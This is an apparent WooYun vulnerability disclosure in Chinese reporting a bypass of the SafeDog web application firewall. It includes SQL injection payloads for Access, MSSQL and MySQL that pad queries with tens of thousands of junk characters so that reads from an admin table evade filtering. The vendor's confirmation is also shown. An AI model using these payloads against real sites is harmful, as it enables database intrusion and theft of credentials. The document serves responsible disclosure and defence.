漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2015-08-13: 细节已通知厂商并且等待厂商处理中
2015-08-14: 厂商已经确认,细节仅向厂商公开
2015-08-17: 细节向第三方安全合作伙伴开放
2015-10-08: 细节向核心白帽子及相关领域专家公开
2015-10-18: 细节向普通白帽子公开
2015-10-28: 细节向实习白帽子公开
2015-11-12: 细节向公众公开
简要描述:
总是说让自己无路可走,然而我就不这么认为。世上本没有路,走的人多了也便成了路。
详细说明:
安全狗版本:
简单的查询不会被拦截:select(1),(2),(3)
当使用from欲从目标表中查询数据的时候,被安全狗拦截:sql=select(1),(2),(3)from[admin]
尝试在select和from之间构造出很长的垃圾数据:
access: sql=select(user),(2),(000000..5万个左右的0...00001)from[admin]
mssql: sql=select(user),(2),(00000..100个0...0001+00000..100个0...0001-00000..100个0...0001.....重复加减括号内总字符数5万左右....+00000..100个0...0001-00000..100个0...0001)from[admin]
mysql: sql=select(user),(2),(0000...5万左右的0...001)as`aa`from`admin`
成功从admin表中查询出数据:
漏洞证明:
修复方案:
版权声明:转载请注明来源 RedFree@乌云
>
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2015-08-14 10:51
厂商回复:
感谢提交,无情棍打更能磨练我们的意志,提升我们的水准,自己造成的漏洞,跪着也要修补好,赶紧修漏洞去。
最新状态:
暂无